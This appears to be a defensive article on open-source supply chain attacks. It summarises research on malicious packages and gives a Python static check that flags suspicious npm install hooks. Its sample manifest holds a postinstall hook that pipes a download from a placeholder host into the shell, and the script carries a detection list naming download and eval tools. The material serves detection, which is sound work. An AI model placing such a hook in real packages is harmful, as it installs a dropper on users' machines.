Building, contributing to, and studying large datasets on software supply chain attacks can help organizations elevate their defenses. Threat hunters and data scientists working together, or dual-hatted individuals, can scour these datasets to uncover new insights that enable better analytics for hunting emerging threats.
For example, in the research paper, "Backstabber’s Knife Collection: A Review of Open-Source Software Supply Chain Attacks," the authors discuss a dataset of 174 malicious software packages that were used in the wild from November 2015 to November 2019. To be clear, these software packages were not examples of coding errors or neglect that led to vulnerabilities being exploited. Rather, they were intentionally malicious and meant to exploit the trust that exists in package repositories.
More than half of the 174 malicious packages aimed to exfiltrate data, and about a third functioned as droppers that download a second-stage payload. How malicious code is triggered depends on the code and the language. It could run unconditionally at install time or at runtime, or it could be conditional and run only when certain criteria are met (e.g., not in a sandbox environment, only on certain operating systems, or only when certain hardware is present). Tools like Falco and Package Hunter can help defenders identify malicious packages by monitoring the system calls executed during installation.
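One common way code "runs upon install" in the npm ecosystem is through lifecycle scripts such as `preinstall`, `install`, and `postinstall`, which npm executes automatically. The sketch below is a minimal static triage check, assuming an npm-style `package.json` that has already been parsed into a dictionary. The function names and the `SUSPICIOUS_TOKENS` list are hypothetical and for illustration only. A static check like this complements, rather than replaces, dynamic syscall monitoring of the kind Falco and Package Hunter perform, and conditionally triggered payloads can slip past both.

```python
import json
from typing import Dict, List

# npm lifecycle scripts that run automatically when a package is installed.
# (npm can also run "prepare" in some install scenarios, e.g., git dependencies.)
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Hypothetical, deliberately small list of substrings worth a closer look in an
# install hook. A real triage list would be broader and tuned to reduce noise.
SUSPICIOUS_TOKENS = ("curl ", "wget ", "http://", "https://", "base64", "eval(", "node -e")


def find_install_hooks(manifest: Dict) -> Dict[str, str]:
    """Return the install-time lifecycle scripts declared in a package.json dict."""
    scripts = manifest.get("scripts", {}) or {}
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def flag_hooks(manifest: Dict) -> List[str]:
    """Return findings for install hooks whose commands contain suspicious tokens."""
    findings = []
    for name, cmd in find_install_hooks(manifest).items():
        hits = [tok.strip() for tok in SUSPICIOUS_TOKENS if tok in cmd]
        if hits:
            findings.append(f"{name}: {cmd!r} matches {hits}")
    return findings


if __name__ == "__main__":
    # Illustrative manifest; example.invalid is a reserved, non-resolvable domain.
    example = json.loads("""
    {
      "name": "example-pkg",
      "version": "1.0.0",
      "scripts": {
        "test": "jest",
        "postinstall": "curl -s https://example.invalid/p.sh | sh"
      }
    }
    """)
    print(find_install_hooks(example))
    for finding in flag_hooks(example):
        print(finding)
```

A hit is only a lead for a hunter, not a verdict: many legitimate packages use install hooks (for example, to compile native add-ons), so findings like these are best correlated with what the package actually does when installed in a monitored sandbox.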
More broadly, network defenders need greater access to large datasets on software supply chain attacks, and they can help make that happen. For instance, Roberto Rodriguez and Jose Luis Rodriguez have created "an open-source initiative—Security Datasets project—that contributes malicious and benign datasets, from different platforms, to the infosec community to expedite data analysis and threat research." Their growing project would benefit greatly from datasets on software supply chain attacks. Threat hunters, security researchers, and data scientists should look for opportunities to contribute such datasets.